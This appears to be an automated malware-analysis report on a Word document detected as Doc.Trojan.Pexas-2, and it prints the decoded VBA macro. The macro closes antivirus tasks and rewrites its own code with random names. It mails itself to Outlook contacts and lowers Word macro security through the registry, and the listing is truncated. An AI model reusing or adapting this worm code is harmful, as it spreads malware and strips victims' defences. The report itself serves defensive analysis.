MALICIOUS
380
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1027 Obfuscated Files or Information
T1204.002 Malicious File
The file contains a Document_Open VBA macro that is heavily obfuscated and uses CreateObject and Shell calls. The script attempts to disable security features by setting the wallpaper and closing antivirus tasks. The presence of obfuscated auto-exec loaders and the ClamAV detection strongly indicate malicious intent, likely to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Trojan.Pexas-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Pexas-2
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6638 bytes |
SHA-256: 25e6dd23eaf8f661c2334048b8feea9710689ea4be7e7588bc2f5c07d713668c |
|||
|
Detection
ClamAV:
Doc.Trojan.Pexas-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long
Sub Document_Open() 'f�„
On Error Resume Next ')<+
IUJMp = Day(Date) 'r†5
If IUJMp = 23 Then 'p"Ś
MsgBox Chr(34) + Chr(100) + Chr(105) + Chr(101) + Chr(32) + Chr(100) + Chr(105) + Chr(101) + Chr(32) + _
Chr(100) + Chr(105) + Chr(101) + Chr(34) + Chr(32) + Chr(45) + Chr(91) + Chr(100) + Chr(105) + Chr(101) + _
Chr(51) + Chr(93) + Chr(45) + Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(77) + Chr(73) + Chr(95) + Chr(112) + _
Chr(105) + Chr(114) + Chr(97) + Chr(116), vbInformation, Chr(100) + Chr(105) + Chr(101) + Chr(51) + Chr(32) + _
Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115) '3h|
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", "Wallpaper") = "C:\Windows\setup.bmp"
ShowCursor 0 ';su
End If 'c~Y
For RMNMp = 1 To Tasks.Count '9|=
If InStr(1, Tasks(RMNMp).Name, "av", vbTextCompare) Or InStr(1, Tasks(RMNMp).Name, "AV", vbTextCompare) Then
Tasks(RMNMp).Close '+m‰
End If '” ”
Next RMNMp '&Ds
If ThisDocument.FullName <> Templates(1).FullName Then '–Ź-
IUJMp = 16 '7•z
ReDim WFAMp(1 To IUJMp) As String '\vf
WFAMp(1) = "IUJMp": WFAMp(2) = "YCQMp": WFAMp(3) = "WFAMp": WFAMp(4) = "SWXMp" 'n�n
WFAMp(5) = "TVTMp": WFAMp(6) = "RMNMp": WFAMp(7) = "KUOMp": WFAMp(8) = "PJVMp" '’@0
WFAMp(9) = "UIHMp": WFAMp(10) = "PUDMp": WFAMp(11) = "DIVMp" '{._
WFAMp(12) = "RRXMp": WFAMp(13) = "IBEMp": WFAMp(14) = "YKBMp": WFAMp(15) = "DXRMp": WFAMp(16) = "FKXMp"
Set KUOMp = ActiveDocument.VBProject.VBComponents(1).CodeModule 'Ejo
For RMNMp = 1 To IUJMp '|8H
Randomize 'g%Y
TVTMp = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + "Mp" 'ZXs
For YCQMp = 2 To KUOMp.CountOfLines 'ŚF„
PJVMp = KUOMp.Lines(YCQMp, 1) '7�>
If InStr(1, PJVMp, WFAMp(RMNMp), vbTextCompare) Then '�;2
PJVMp = Replace(PJVMp, WFAMp(RMNMp), TVTMp, 1, -1, vbTextCompare) '\!
KUOMp.ReplaceLine YCQMp, PJVMp 'Ź,r
End If '…&&
Next YCQMp ', c
Next RMNMp '�7|
For RMNMp = 2 To KUOMp.CountOfLines 'S#T
PJVMp = KUOMp.Lines(RMNMp, 1) 'yhL
If Len(PJVMp) <= 100 Then ' [A
PJVMp = PJVMp + "'" + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32))
KUOMp.ReplaceLine RMNMp, PJVMp '‰2C
End If 'MF‡
Next RMNMp 'AH‘
End If 'ww/
Dim UIHMp, PUDMp, DIVMp 'P+o
Set UIHMp = CreateObject("Outlook.Application") '^”V
Set PUDMp = UIHMp.GetNameSpace("MAPI") 'md–
If UIHMp = "Outlook" Then '+ŤU
PUDMp.Logon "profile", "password" 'd”n
Set RRXMp = PUDMp.AddressLists 'Md†
For RMNMp = 1 To RRXMp.Count 'i“{
Set ABook = PUDMp.AddressLists(RMNMp) 'wŠo
IBEMp = 1 'DS'
Set YKBMp = ABook.AddressEntries 'eU^
Set DIVMp = UIHMp.CreateItem(0) 'ZZY
For FKXMp = 1 To YKBMp.Count 'V‡%
DXRMp = YKBMp(IBEMp) 'Ž’,
DIVMp.Recipients.Add DXRMp 'N!m
IBEMp = IBEMp + 1 'L€M
If IBEMp > 20 Then IUJMp = YKBMp.Count '”R�
Next FKXMp '–C7
DIVMp.Subject = "hello!!!" 'YNH
DIVMp.Body = "Cool jokes (more in the doc.) " 'kz,
DIVMp.Attachments.Add ActiveDocument.FullName '}wR
DIVMp.Send 'Q3Ž
DXRMp = "" '$:%
Next RMNMp 'j6F
PUDMp.Logoff 'L$"
End If '‚.B
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "XP") <> "inXP" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "XP") = "inXP" '!†9
Options.SaveNormalPrompt = 5 Xor 5 't–`
CommandBars(Chr(84) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111)).Enabled = (1 Xor 1)
Open "C:\a.reg" For Output As #1 'iQK
Print #1, "REGEDIT4" '2{4
Print #1, "" 'rl8
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]" 'TN=
Print #1, """Level"" = dword:00000001" 'Ut�
Print #1, """AccessVBOM"" = dword:00000001" 'a2)
Print #1, "[HKEY_LOCAL_MACHINE\Software\Microso
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.